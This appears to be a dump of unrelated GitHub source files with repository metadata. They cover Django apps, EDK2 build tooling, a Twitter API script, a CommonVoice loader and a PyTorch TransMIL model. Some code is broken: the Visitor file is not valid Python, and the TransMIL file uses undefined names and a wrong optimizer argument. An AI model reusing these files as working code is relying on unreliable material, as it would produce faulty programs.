8ee9314035840f81d9d7478010945151bda3a8df | 4e8249081379a1305b7ff91d5692167cb1484dd7 | /Hubb_ediff.py | 1bc622467332e00de13bf237ef91d8e5d2734da3 | [] | no_license | TIm097/Bachelorarbeit | 4e7cc264f2052c72542f4db3b77e2e86912c2483 | c75f8f117fc9dea39909f568ffe6e812e7ad063c | refs/heads/master | 2020-12-25T18:52:11.362052 | 2017-08-16T13:41:32 | 2017-08-16T13:41:32 | 93,999,748 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | import numpy as np
import matplotlib.pyplot as plt
U, dE = np.genfromtxt('Stationäre_Systeme/Hubb_Eig_Ergebn/Hubb_ediff.txt', unpack = 'True')
plt.plot(U,dE,color = (1,0.5,0),label = r'$\Delta E_{0 \to 2}$')
plt.legend(loc = 'best')
plt.xlim(0,15)
plt.ylim(0,1.4)
plt.xlabel(r'$U/J$')
plt.ylabel(r'$E/J$')
plt.tight_layout()
plt.grid()
plt.savefig('build/Hubb_ediff_plot.pdf')
| [
"timo.graesser@gmx.de"
] | timo.graesser@gmx.de |
1cb0796a2e4782fccd381c4b5ee34854cb4ee2ac | 20fa87e590e99b03ad210bc1e6bde8fe4c02f47d | /SocialNetworkHarvester/Collection/migrations/0008_auto_20181010_0522.py | 362759d3f3a81ea9f6f07c24d557902e4c9e3923 | [] | no_license | GRCP-Ulaval/Social-Network-Harvester | e5f30a165d77b2a095bd3f0fed90be38f8bc7760 | 141ad02e89d8e450e40b05c530ebf965a1ec30e5 | refs/heads/master | 2020-03-28T16:24:03.617256 | 2018-12-23T16:31:00 | 2018-12-23T16:31:00 | 148,690,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 526 | py | # Generated by Django 2.1.1 on 2018-10-10 05:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('Collection', '0007_auto_20181005_1716'),
]
operations = [
migrations.AlterField(
model_name='collectionitem',
name='collection',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='collection_items', to='Collection.Collection'),
),
]
| [
"scloutier@nexapp.ca"
] | scloutier@nexapp.ca |
34b0a3903fbab558986e74b115ebb5bf14cae7a3 | 7c857119fe1505b1d80d6e62969661c06dc1a2f4 | /BaseTools/Source/Python/GenFds/VerSection.py | 7280e80cb4ef7ce47524af2de67a3c2e84cf5a33 | [
"BSD-2-Clause"
] | permissive | CloverHackyColor/CloverBootloader | 7042ca7dd6b513d22be591a295e49071ae1482ee | 2711170df4f60b2ae5aa20add3e00f35cf57b7e5 | refs/heads/master | 2023-08-30T22:14:34.590134 | 2023-08-27T19:14:02 | 2023-08-27T19:14:02 | 205,810,121 | 4,734 | 770 | BSD-2-Clause | 2023-09-03T12:41:33 | 2019-09-02T08:22:14 | C | UTF-8 | Python | false | false | 2,917 | py | ## @file
# process Version section generation
#
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import absolute_import
from .Ffs import SectionSuffix
import Common.LongFilePathOs as os
from .GenFdsGlobalVariable import GenFdsGlobalVariable
from CommonDataClass.FdfClass import VerSectionClassObject
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.DataType import SUP_MODULE_SEC
## generate version section
#
#
class VerSection (VerSectionClassObject):
## The constructor
#
# @param self The object pointer
#
def __init__(self):
VerSectionClassObject.__init__(self)
## GenSection() method
#
# Generate version section
#
# @param self The object pointer
# @param OutputPath Where to place output file
# @param ModuleName Which module this section belongs to
# @param SecNum Index of section
# @param KeyStringList Filter for inputs of section generation
# @param FfsInf FfsInfStatement object that contains this section data
# @param Dict dictionary contains macro and its value
# @retval tuple (Generated file name, section alignment)
#
def GenSection(self, OutputPath, ModuleName, SecNum, KeyStringList, FfsInf=None, Dict=None, IsMakefile = False):
#
# Prepare the parameter of GenSection
#
if FfsInf:
self.Alignment = FfsInf.__ExtendMacro__(self.Alignment)
self.BuildNum = FfsInf.__ExtendMacro__(self.BuildNum)
self.StringData = FfsInf.__ExtendMacro__(self.StringData)
self.FileName = FfsInf.__ExtendMacro__(self.FileName)
OutputFile = os.path.join(OutputPath,
ModuleName + SUP_MODULE_SEC + SecNum + SectionSuffix.get('VERSION'))
OutputFile = os.path.normpath(OutputFile)
# Get String Data
StringData = ''
if self.StringData:
StringData = self.StringData
elif self.FileName:
if Dict is None:
Dict = {}
FileNameStr = GenFdsGlobalVariable.ReplaceWorkspaceMacro(self.FileName)
FileNameStr = GenFdsGlobalVariable.MacroExtend(FileNameStr, Dict)
FileObj = open(FileNameStr, 'r')
StringData = FileObj.read()
StringData = '"' + StringData + '"'
FileObj.close()
GenFdsGlobalVariable.GenerateSection(OutputFile, [], 'EFI_SECTION_VERSION',
Ver=StringData, BuildNumber=self.BuildNum, IsMakefile=IsMakefile)
OutputFileList = []
OutputFileList.append(OutputFile)
return OutputFileList, self.Alignment
| [
"isakov-sl@bk.ru"
] | isakov-sl@bk.ru |
e1dbaf7dcd094b4802420ad1fd6fd67bcb521207 | 1af63dfd09f641cabb1ab6f9ac04eabd564edcfd | /backend/apps/api/views.py | a79186bb61e5027b05e5191b467d2a559c9cfb78 | [
"MIT"
] | permissive | MAX-EINSTEIN/django-react-starter | 05409f561c4d6410712637d791453373a20b97fa | cba2d7381d27743f0b32d84f673d25d78751eae4 | refs/heads/main | 2023-06-05T22:49:56.289999 | 2021-06-18T23:18:10 | 2021-06-18T23:18:10 | 376,601,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | from rest_framework import generics
from backend.apps.blog.models import Post
from .serializers import PostSerializer
class PostsListView(generics.ListCreateAPIView):
queryset = Post.published_posts_objects.all()
serializer_class = PostSerializer
class PostDetailView(generics.RetrieveUpdateDestroyAPIView):
queryset = Post.objects.all()
serializer_class = PostSerializer
| [
"maxeinstein.dev@gmail.com"
] | maxeinstein.dev@gmail.com |
b197dbe5eb039338439bb8c6b3e6fb20f0f80e18 | db1247a3999e3f22db025639d09a605082ded89d | /grid/urls.py | 4da7303e5324e7da6e0f39e3e8d1faa61df9ca6a | [
"MIT"
] | permissive | wise-team/hiveprojects.io | 1614deb0e4df5fe19cf62dbdb4d8d2741173c6b0 | 96e15a53f02c7327fe982a06b2dce56cd130e38c | refs/heads/master | 2022-12-12T18:44:35.221892 | 2020-03-27T21:50:03 | 2020-03-27T21:50:03 | 248,597,914 | 5 | 1 | MIT | 2022-11-22T01:59:55 | 2020-03-19T20:24:59 | Python | UTF-8 | Python | false | false | 2,093 | py | """grid url patterns"""
from django.conf.urls import url
from grid import views
from grid.views import (
add_feature,
add_grid,
add_grid_package,
add_new_grid_package,
ajax_grid_list,
delete_feature,
delete_grid_package,
edit_element,
edit_grid,
edit_feature,
grid_detail,
grids
)
urlpatterns = [
url(
regex='^add/$',
view=add_grid,
name='add_grid',
),
url(
regex='^(?P<slug>[-\w]+)/edit/$',
view=edit_grid,
name='edit_grid',
),
url(
regex='^element/(?P<feature_id>\d+)/(?P<package_id>\d+)/$',
view=edit_element,
name='edit_element',
),
url(
regex='^feature/add/(?P<grid_slug>[a-z0-9\-\_]+)/$',
view=add_feature,
name='add_feature',
),
url(
regex='^feature/(?P<id>\d+)/$',
view=edit_feature,
name='edit_feature',
),
url(
regex='^feature/(?P<id>\d+)/delete/$',
view=delete_feature,
name='delete_feature',
),
url(
regex='^package/(?P<id>\d+)/delete/$',
view=delete_grid_package,
name='delete_grid_package',
),
url(
regex='^(?P<grid_slug>[a-z0-9\-\_]+)/package/add/$',
view=add_grid_package,
name='add_grid_package',
),
url(
regex='^(?P<grid_slug>[a-z0-9\-\_]+)/package/add/new$',
view=add_new_grid_package,
name='add_new_grid_package',
),
url(
regex='^ajax_grid_list/$',
view=ajax_grid_list,
name='ajax_grid_list',
),
url(
regex='^$',
view=grids,
name='grids',
),
url(
regex='^g/(?P<slug>[-\w]+)/$',
view=grid_detail,
name='grid',
),
url(
regex='^g/(?P<slug>[-\w]+)/landscape/$',
view=views.grid_detail_landscape,
name='grid_landscape',
),
url(regex='^g/(?P<slug>[-\w]+)/timesheet/$',
view=views.grid_timesheet,
name='grid_timesheet'
)
]
| [
"noisy.pl@gmail.com"
] | noisy.pl@gmail.com |
b770f60b8ee7ddb0eb580e58766ac7eb067ca4d2 | cd3c8bf0a875c9393991df64b9eb15659e5093db | /data_retrieve.py | e0cd61eefd601bf2d12f53f98b191ba9345db4f5 | [] | no_license | william-hackett/cs1951a | 143c06040ce3daf8fb70e19f10c0df1811f575ae | 1af5d33cb0a0564d1302ab4ea6d2c80dba711ef9 | refs/heads/master | 2022-12-11T02:34:13.695662 | 2019-05-01T20:38:38 | 2019-05-01T20:38:38 | 171,779,192 | 0 | 0 | null | 2022-12-08T01:41:11 | 2019-02-21T01:38:39 | Python | UTF-8 | Python | false | false | 801 | py | import oauth2 as oauth
import json
with open('twitter_auth.json') as json_file:
data = json.load(json_file)
CONSUMER_KEY = data["CONSUMER-KEY"]
CONSUMER_SECRET = data["CONSUMER-SECRET"]
# Create your consumer with the proper key/secret.
consumer = oauth.Consumer(key=CONSUMER_KEY,
secret=CONSUMER_SECRET)
# Request token URL for Twitter.
# Trends for global, WOEID = 1 is global
request_token_url = "https://api.twitter.com/1.1/trends/place.json?id=2357536"
# Create our client.
client = oauth.Client(consumer)
# The OAuth Client request works just like httplib2 for the most part.
resp, content = client.request(request_token_url, "GET")
trend_data = json.loads(content)
t = trend_data[0]["trends"]
with open('data.json', 'w') as outfile:
json.dump(t, outfile)
print trend_data
| [
"tymani_ratchford@brown.edu"
] | tymani_ratchford@brown.edu |
c5ad1b5d232b6458e70b9d7459d2978fcf989724 | 1bde114a847c629701e3acd004be5788594e0ef1 | /Examples/PatternRefactoring/trashvisitor/Visitor.py | 29bc5089c2ffa37d3322ce93d7a97ca546f4a1f4 | [] | no_license | BruceEckel/ThinkingInPython | 0b234cad088ee144bb8511e1e7db9fd5bba78877 | 76a1310deaa51e02e9f83ab74520b8269aac6fff | refs/heads/master | 2022-02-21T23:01:40.544505 | 2022-02-08T22:26:52 | 2022-02-08T22:26:52 | 97,673,620 | 106 | 33 | null | 2022-02-08T22:26:53 | 2017-07-19T04:43:50 | Python | UTF-8 | Python | false | false | 215 | py | # PatternRefactoring/trashvisitor/Visitor.py
# The base class for visitors.
class Visitor:
def visit(self, Aluminum a)
def visit(self, Paper p)
def visit(self, Glass g)
def visit(self, Cardboard c)
| [
"mindviewinc@gmail.com"
] | mindviewinc@gmail.com |
d8efecb43d9198e3dd2221f4e39fb241646378fc | 0032d988541e85c47b5034c20ecf88220dde5a95 | /openbook_posts/migrations/0026_auto_20190414_1620.py | 242d6b7b2f6ad2429773288abeaee56f0fb9ccf8 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | OkunaOrg/okuna-api | eabd37fef9d2be59b590ed8d72bee084ac377997 | f87d8e80d2f182c01dbce68155ded0078ee707e4 | refs/heads/master | 2022-02-04T21:31:10.577601 | 2021-12-28T18:20:39 | 2021-12-28T18:20:39 | 151,052,951 | 185 | 92 | MIT | 2022-01-13T01:00:40 | 2018-10-01T07:44:46 | Python | UTF-8 | Python | false | false | 444 | py | # Generated by Django 2.2 on 2019-04-14 14:20
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('openbook_posts', '0025_post_is_edited'),
]
operations = [
migrations.AlterField(
model_name='post',
name='uuid',
field=models.UUIDField(db_index=True, default=uuid.uuid4, editable=False, unique=True),
),
]
| [
"joel@open-book.org"
] | joel@open-book.org |
cf50ca043b86bceb7361c9ed7fa07a000eb8beab | aee5c07c54d03417abbff170eb3f85adc0e3c60b | /torchaudio/datasets/commonvoice.py | 33250245c33321a003384484510c1fd57ec9b3b6 | [
"BSD-2-Clause"
] | permissive | astaff/audio | 118278012e49e86cfe6dcb91d5eeae84eb2941ca | 27a0f7653bc2918e314b4225782d2b29ef31ae4a | refs/heads/master | 2023-04-25T13:04:27.158545 | 2020-04-20T15:08:21 | 2020-04-20T15:08:21 | 257,380,879 | 0 | 0 | null | 2020-04-20T19:17:28 | 2020-04-20T19:17:27 | null | UTF-8 | Python | false | false | 4,177 | py | import os
from typing import List, Dict, Tuple
import torchaudio
from torchaudio.datasets.utils import download_url, extract_archive, unicode_csv_reader
from torch import Tensor
from torch.utils.data import Dataset
# Default TSV should be one of
# dev.tsv
# invalidated.tsv
# other.tsv
# test.tsv
# train.tsv
# validated.tsv
FOLDER_IN_ARCHIVE = "CommonVoice"
URL = "english"
VERSION = "cv-corpus-4-2019-12-10"
TSV = "train.tsv"
def load_commonvoice_item(line: List[str],
header: List[str],
path: str,
folder_audio: str) -> Tuple[Tensor, int, Dict[str, str]]:
# Each line as the following data:
# client_id, path, sentence, up_votes, down_votes, age, gender, accent
assert header[1] == "path"
fileid = line[1]
filename = os.path.join(path, folder_audio, fileid)
waveform, sample_rate = torchaudio.load(filename)
dic = dict(zip(header, line))
return waveform, sample_rate, dic
class COMMONVOICE(Dataset):
"""
Create a Dataset for CommonVoice. Each item is a tuple of the form:
(waveform, sample_rate, dictionary)
where dictionary is a dictionary built from the tsv file with the following keys:
client_id, path, sentence, up_votes, down_votes, age, gender, accent.
"""
_ext_txt = ".txt"
_ext_audio = ".mp3"
_folder_audio = "clips"
def __init__(self,
root: str,
tsv: str = TSV,
url: str = URL,
folder_in_archive: str = FOLDER_IN_ARCHIVE,
version: str = VERSION,
download: bool = False) -> None:
languages = {
"tatar": "tt",
"english": "en",
"german": "de",
"french": "fr",
"welsh": "cy",
"breton": "br",
"chuvash": "cv",
"turkish": "tr",
"kyrgyz": "ky",
"irish": "ga-IE",
"kabyle": "kab",
"catalan": "ca",
"taiwanese": "zh-TW",
"slovenian": "sl",
"italian": "it",
"dutch": "nl",
"hakha chin": "cnh",
"esperanto": "eo",
"estonian": "et",
"persian": "fa",
"portuguese": "pt",
"basque": "eu",
"spanish": "es",
"chinese": "zh-CN",
"mongolian": "mn",
"sakha": "sah",
"dhivehi": "dv",
"kinyarwanda": "rw",
"swedish": "sv-SE",
"russian": "ru",
"indonesian": "id",
"arabic": "ar",
"tamil": "ta",
"interlingua": "ia",
"latvian": "lv",
"japanese": "ja",
"votic": "vot",
"abkhaz": "ab",
"cantonese": "zh-HK",
"romansh sursilvan": "rm-sursilv"
}
if url in languages:
ext_archive = ".tar.gz"
language = languages[url]
base_url = "https://voice-prod-bundler-ee1969a6ce8178826482b88e843c335139bd3fb4.s3.amazonaws.com"
url = os.path.join(base_url, version, language + ext_archive)
basename = os.path.basename(url)
archive = os.path.join(root, basename)
basename = basename.rsplit(".", 2)[0]
folder_in_archive = os.path.join(folder_in_archive, version, basename)
self._path = os.path.join(root, folder_in_archive)
if download:
if not os.path.isdir(self._path):
if not os.path.isfile(archive):
download_url(url, root)
extract_archive(archive, self._path)
self._tsv = os.path.join(root, folder_in_archive, tsv)
with open(self._tsv, "r") as tsv:
walker = unicode_csv_reader(tsv, delimiter="\t")
self._header = next(walker)
self._walker = list(walker)
def __getitem__(self, n: int) -> Tuple[Tensor, int, Dict[str, str]]:
line = self._walker[n]
return load_commonvoice_item(line, self._header, self._path, self._folder_audio)
def __len__(self) -> int:
return len(self._walker)
| [
"noreply@github.com"
] | noreply@github.com |
cd0886446ab1841e4d9c0e355f95dc0da428673d | 4ccd6dba4fd5b38d2cd80836920f177969bc0216 | /model.py | 874155ad9f220becce242239770767b69a0dbe6c | [] | no_license | Ycblue/TransMIL | 37036eadf518efafb06dded29316406360f7d79e | e48481c35b66085fd897e7fb8fb5ede24d60c22f | refs/heads/main | 2023-08-29T06:02:56.932474 | 2021-10-28T13:56:04 | 2021-10-28T13:56:04 | 422,216,971 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,277 | py | import torch
import torch.nn as nn
from argparse import ArgumentParser
import numpy as np
from nystrom_attention import NystromAttention, Nystromformer # https://github.com/lucidrains/nystrom-attention
import torchvision.models as models
from torch.optim.optimizer import Optimizer
## Lookahead optimizer + CE Loss
class TransMIL(nn.Module):
def __init__(self, n_classes, n_channels=3):
super(TransMIL, self).__init__()
self.L = 512 # 512 node fully connected layer
self.D = 128 # 128 node attention layer
self.K = 1
self.sqrtN = 12 # size for squaring
self.n_classes = n_classes
self.n_channels = n_channels
resnet50 = models.resnet50(pretrained=True)
modules = list(resnet50.children())[:-3]
self.resnet_extractor = nn.Sequential(
*modules,
nn.AdaptiveAvgPool2d(1),
View((-1, 1024)),
nn.Linear(1024, self.L)
)
self.class_token = nn.Parameter(torch.zeros(1, 1, 512))
self.nystromer1 = Nystromformer(dim = self.L, depth=1)
self.nystromer2 = Nystromformer(dim = self.L, depth=1)
self.grp_conv1 = nn.Conv2d(512, 512, 3, padding=1)
self.grp_conv2 = nn.Conv2d(512, 512, 5, padding=2)
self.grp_conv3 = nn.Conv2d(512, 512, 7, padding=3)
self.ln = nn.LayerNorm(self.L)
if self.n_classes == 2:
self.fc = nn.Linear(self.L, 1)
else:
self.fc = nn.Linear(self.L, self.n_classes)
def forward(self, x):
x = x.squeeze(0)
if self.n_channels==1:
x = torch.cat((x,x,x), 1)
Hf = self.feature_extractor(x)
Hf = Hf.squeeze(1) #512 features
##################################################
# Squaring
####################################################
# ToDo: Testing
N = np.square(self.sqrtN)
while Hf.shape[0] != N:
if Hf.shape[0] > N: # some of our WSIs have more than N patches, but most have less
Hf = Hf[:N, :]
else:
d = N - Hf.shape[0]
missing = Hf[:d, :]
Hf = torch.cat((Hf, missing), 0)
Hf = Hf.squeeze().unsqueeze(0)
Hs = torch.cat((self.class_token, Hf), 1)
####################################################
# MSA
####################################################
Hs = self.nystromer1(Hs) + Hs
####################################################
# PPEG
####################################################
Hc, Hf = torch.split(Hs, [1,Hs.shape[1]-1], 1)
Hf = Hf.view(1, -1, self.sqrtN, self.sqrtN)
Hf1 = self.grp_conv1(Hf)
Hf2 = self.grp_conv2(Hf)
Hf3 = self.grp_conv3(Hf)
Hfs = Hf1 + Hf2 + Hf3
Hfs = Hfs.view(1, N, -1)
Hs = torch.cat((Hc, Hfs), 1)
####################################################
# MSA 2
####################################################
Hs = self.nystromer1(Hs) + Hs
####################################################
# MLP
####################################################
Hc, Hf = torch.split(Hs, [1,Hs.shape[1]-1], 1)
Hc = Hc.squeeze()
output = self.fc(self.ln(Hc))
Y_hat = torch.ge(output, 1/self.n_classes).float()
return output, Y_hat, Hc
def configure_optimizers(self):
lr = 2e-4
decay = 1e-5
optim = Lookahead(torch.optim.AdamW(self.parameters(), lr=lr, decay=decay))
return optim
# return torch.optim.Adam(self.parameters(), lr=self.lr)
class View(nn.Module):
def __init__(self, shape):
super().__init__()
self.shape = shape
def forward(self, input):
'''
Reshapes the input according to the shape saved in the view data structure.
'''
batch_size = input.size(0)
shape = (batch_size, *self.shape)
out = input.view(shape)
return out
class Lookahead(Optimizer):
r"""PyTorch implementation of the lookahead wrapper.
Lookahead Optimizer: https://arxiv.org/abs/1907.08610
"""
def __init__(self, optimizer, la_steps=5, la_alpha=0.8, pullback_momentum="none"):
"""optimizer: inner optimizer
la_steps (int): number of lookahead steps
la_alpha (float): linear interpolation factor. 1.0 recovers the inner optimizer.
pullback_momentum (str): change to inner optimizer momentum on interpolation update
"""
self.optimizer = optimizer
self._la_step = 0 # counter for inner optimizer
self.la_alpha = la_alpha
self._total_la_steps = la_steps
pullback_momentum = pullback_momentum.lower()
assert pullback_momentum in ["reset", "pullback", "none"]
self.pullback_momentum = pullback_momentum
self.state = defaultdict(dict)
# Cache the current optimizer parameters
for group in optimizer.param_groups:
for p in group['params']:
param_state = self.state[p]
param_state['cached_params'] = torch.zeros_like(p.data)
param_state['cached_params'].copy_(p.data)
if self.pullback_momentum == "pullback":
param_state['cached_mom'] = torch.zeros_like(p.data)
def __getstate__(self):
return {
'state': self.state,
'optimizer': self.optimizer,
'la_alpha': self.la_alpha,
'_la_step': self._la_step,
'_total_la_steps': self._total_la_steps,
'pullback_momentum': self.pullback_momentum
}
def zero_grad(self):
self.optimizer.zero_grad()
def get_la_step(self):
return self._la_step
def state_dict(self):
return self.optimizer.state_dict()
def load_state_dict(self, state_dict):
self.optimizer.load_state_dict(state_dict)
def _backup_and_load_cache(self):
"""Useful for performing evaluation on the slow weights (which typically generalize better)
"""
for group in self.optimizer.param_groups:
for p in group['params']:
param_state = self.state[p]
param_state['backup_params'] = torch.zeros_like(p.data)
param_state['backup_params'].copy_(p.data)
p.data.copy_(param_state['cached_params'])
def _clear_and_load_backup(self):
for group in self.optimizer.param_groups:
for p in group['params']:
param_state = self.state[p]
p.data.copy_(param_state['backup_params'])
del param_state['backup_params']
@property
def param_groups(self):
return self.optimizer.param_groups
def step(self, closure=None):
"""Performs a single Lookahead optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = self.optimizer.step(closure)
self._la_step += 1
if self._la_step >= self._total_la_steps:
self._la_step = 0
# Lookahead and cache the current optimizer parameters
for group in self.optimizer.param_groups:
for p in group['params']:
param_state = self.state[p]
p.data.mul_(self.la_alpha).add_(param_state['cached_params'], alpha=1.0 - self.la_alpha) # crucial line
param_state['cached_params'].copy_(p.data)
if self.pullback_momentum == "pullback":
internal_momentum = self.optimizer.state[p]["momentum_buffer"]
self.optimizer.state[p]["momentum_buffer"] = internal_momentum.mul_(self.la_alpha).add_(
1.0 - self.la_alpha, param_state["cached_mom"])
param_state["cached_mom"] = self.optimizer.state[p]["momentum_buffer"]
elif self.pullback_momentum == "reset":
self.optimizer.state[p]["momentum_buffer"] = torch.zeros_like(p.data)
return loss
| [
"noreply@github.com"
] | noreply@github.com |
b116ab0d106d450a2588ca813cf8f785bac5d357 | de088c95a043757049dee381ee9a63da9a7c0a61 | /bits/NumberOfOneBits/solution.py | 8ca6fefb0c196ed269807ebd2b8959c28edda77f | [] | no_license | tstl87/PythonInterviewQuestions | 74f8cbf198c5dcc793abe195e1e19fa4fd77c947 | 35758f897c0e4eb2653617b29cbe23c28447f05f | refs/heads/master | 2023-04-04T15:01:35.650611 | 2021-03-31T16:54:46 | 2021-03-31T16:54:46 | 255,759,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | def one_bits(n):
count = 0
while n > 0:
if n & 1:
count += 1
n = n >> 1
return count
print(one_bits(23))
# 0b10111 | [
"Skylar.Trigueiro@gmail.com"
] | Skylar.Trigueiro@gmail.com |
d29e69deb81568751f654286b92db80ff300ebf9 | 49bc52bb78181adad44f2ca4723bf102547cfd0b | /tests/unit/test_routes.py | a4b793b548d7f33f8690170ae88c95c135dd1c60 | [
"MIT"
] | permissive | CryptoJones/resources_api | d65ea31f468f9ebfcdd36500db0185e9d6353cf1 | f290b165415c08f1fb90ace36cad222549dbe7d5 | refs/heads/master | 2020-04-09T20:44:07.105219 | 2018-12-07T02:26:51 | 2018-12-07T02:26:51 | 160,582,699 | 0 | 0 | MIT | 2018-12-05T21:45:57 | 2018-12-05T21:45:56 | null | UTF-8 | Python | false | false | 278 | py | import pytest
from app.models import Resource, Language, Category
def test_does_nothing():
"""
GIVEN a User model
WHEN a new User is created
THEN check the email, hashed_password, authenticated, and role fields are defined correctly
"""
assert(1 == 1)
| [
"wimo7083@colorado.edu"
] | wimo7083@colorado.edu |
75f699fc7133cc78df3b45856ce7c1263bde245b | 83133aa5638bd29730d10e9d4d1fbdf97f0844b8 | /stl_text/datamodule/contrastive_pretraining.py | 015b19ccabbbf90ad5e0087278c17f3ffe1c90cc | [] | no_license | hudeven/text | 1f38fa81205f727011fe8dd29023acf653773083 | 9fc5b4962282d7e1dc8d5fa5eb3258f253981060 | refs/heads/master | 2023-02-27T03:26:46.424043 | 2021-01-05T22:37:57 | 2021-01-05T22:37:57 | 318,316,656 | 0 | 4 | null | 2021-02-23T01:05:18 | 2020-12-03T20:52:10 | Python | UTF-8 | Python | false | false | 4,619 | py | import os
import random
from collections import defaultdict
from typing import Optional
import torch
import datasets as ds
from pytorch_lightning import LightningDataModule
from stl_text.ops.tokenizers import WhitespaceTokenizer
from stl_text.ops.transforms import LabelTransform
from torch.nn.utils.rnn import pad_sequence
from stl_text.ops.samplers import PoolBatchSampler
from .doc_classification import DocClassificationDataModule
class ContrastivePretrainingDataModule(LightningDataModule):
def __init__(self, data_path: str = 'paraphrases', vocab_path: Optional[str] = None, batch_size: int = 32,
drop_last: bool = False,
num_proc_in_map: int = 1, distributed: bool = False, load_from_cache_file: bool = True):
super().__init__()
self.data_path = data_path
self.vocab_path = vocab_path
self.batch_size = batch_size
self.drop_last = drop_last
self.num_proc_in_map = num_proc_in_map
self.distributed = distributed
self.load_from_cache_file = load_from_cache_file
self.text_transform = None
self.datasets = {}
def setup(self, stage):
self.text_transform = WhitespaceTokenizer(vocab_path=self.vocab_path)
for split in ("train", "valid", "test"):
self.datasets[split] = ds.Dataset.load_from_disk(os.path.join(self.data_path, split)) # raw dataset
self.datasets[split] = self.datasets[split].map(function=lambda x: {'anchor_ids': self.text_transform(x)},
input_columns='anchor', num_proc=self.num_proc_in_map,
load_from_cache_file=self.load_from_cache_file)
self.datasets[split] = self.datasets[split].map(function=lambda xs: {'all_positive_ids': [self.text_transform(x) for x in xs]},
input_columns='positives', num_proc=self.num_proc_in_map,
load_from_cache_file=self.load_from_cache_file)
self.datasets[split] = self.datasets[split].map(function=lambda x: {'seq_len': len(x)},
input_columns='anchor_ids', num_proc=self.num_proc_in_map,
load_from_cache_file=self.load_from_cache_file)
self.datasets[split].set_format(type='torch', columns=['anchor_ids', 'all_positive_ids', 'seq_len'])
def forward(self, text):
return self.text_transform(text)
def train_dataloader(self):
# sample data into `num_batches_in_page` sized pool. In each pool, sort examples by sequence length, batch them
# with `batch_size` and shuffle batches
batch_sampler = PoolBatchSampler(self.datasets["train"], batch_size=self.batch_size,
drop_last=self.drop_last, key=lambda row: row["seq_len"])
return torch.utils.data.DataLoader(self.datasets["train"], batch_sampler=batch_sampler,
num_workers=1,
collate_fn=self.collate)
def valid_dataloader(self):
return torch.utils.data.DataLoader(self.self.datasets["valid"], shuffle=True, batch_size=self.batch_size,
num_workers=1,
collate_fn=self.collate)
def test_dataloader(self):
return torch.utils.data.DataLoader(self.datasets["test"], shuffle=False, batch_size=self.batch_size,
num_workers=1,
collate_fn=self.collate)
def collate(self, batch):
for row in batch:
row["positive_ids"] = random.sample(row["all_positive_ids"], 1)[0]
row.pop("all_positive_ids")
return self._collate(batch, pad_columns=("anchor_ids", "positive_ids"))
# generic collate(), same as DocClassificationDataModule
def _collate(self, batch, pad_columns=("token_ids",)):
columnar_data = defaultdict(list)
for row in batch:
for column, value in row.items():
columnar_data[column].append(value)
padded = {}
for column, v in columnar_data.items():
if pad_columns and column in pad_columns:
padded[column] = pad_sequence(v, batch_first=True)
else:
padded[column] = torch.tensor(v, dtype=torch.long)
return padded
| [
"jeanm@fb.com"
] | jeanm@fb.com |
ac29b396e23dbd83410cb6934bf7dbe55c6370d4 | 09b7d73751a87a48e1a624e076465b343a36a137 | /python-tutorial/basics/types.py | 8cdee3b8b8e16f9cae863c7a124127247b178f78 | [] | no_license | sauravpd/python-tutorial | 8fa11efce996d05d00ebd4bd77409b9a214224ae | 5455bff62ea543ed47b9f8cb9fea67a7b48f8cd2 | refs/heads/master | 2020-04-09T09:43:21.028083 | 2020-01-17T05:58:43 | 2020-01-17T05:58:43 | 160,244,048 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py | x = '48'
y = int(x)
print(f'x is {type(x)}')
print(f'x is {x}')
print(f'y is {type(y)}')
print(f'y is {y}')
# output
#x is <class 'str'>
#x is 48
#y is <class 'int'>
#y is 48 | [
"sauravpd58@gmail.com"
] | sauravpd58@gmail.com |
d3920d74c46452fd447b57f7c829897273f96be7 | 5fc25caef429a2a417a2bdcbeb4b5836c888039f | /ch1/chatting/forms/__init__.py | 5ef72d0039cd87c5d18cc24b2d066be36d45c77a | [] | no_license | dudrnxps/SLANG | f02329e5961c532ae23a3777a116dc1929ee296b | 97d3db6764e80272d9c03b38ff45c5ec55398e9a | refs/heads/master | 2021-01-15T15:31:12.747511 | 2016-06-27T15:48:30 | 2016-06-27T15:48:30 | 50,901,344 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | from chatting.forms.register import RegistrationForm
from chatting.forms.authentication import AuthenticationForm | [
"mkh9209@naver.com"
] | mkh9209@naver.com |
a25e9e320b9dd225167269a092870511465d8631 | 2099fcc36b619db1ff333042f5ab3bd044c7c542 | /client.py | 6c4e363752ca011f64bd68b047123f7f6c7687b6 | [] | no_license | AlekefromKz/Python-Game-TruthOrFalse | 2b27315a5e1b8cf2e261e617d3a5bda50ba87287 | 203a7800b801a04801b83b15962c879e75cf75aa | refs/heads/master | 2023-02-02T19:18:04.556175 | 2020-12-18T17:37:27 | 2020-12-18T17:37:27 | 322,663,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | from truth_or_false.game import Game
from truth_or_false.game_status import GameStatus
print('Welcome to my gameY you will be asking questions one by one. In case you will not make more mistakes than you '
'allowed to make, you will win. Otherwise you will loose!\n\n')
game = Game()
game.get_data()
while game.status == GameStatus.STARTED:
print('The question is:')
print(game.ask_question())
if game.answer_question(input('\nEnter your answer "y"/"n": ')):
print('Right answer!', game.correct_answer())
else:
print('Yow were close!', game.correct_answer())
print('\n')
if game.won:
print('Congratulations!')
else:
print('You lost!') | [
"kydyrmin.almaz@gmail.com"
] | kydyrmin.almaz@gmail.com |
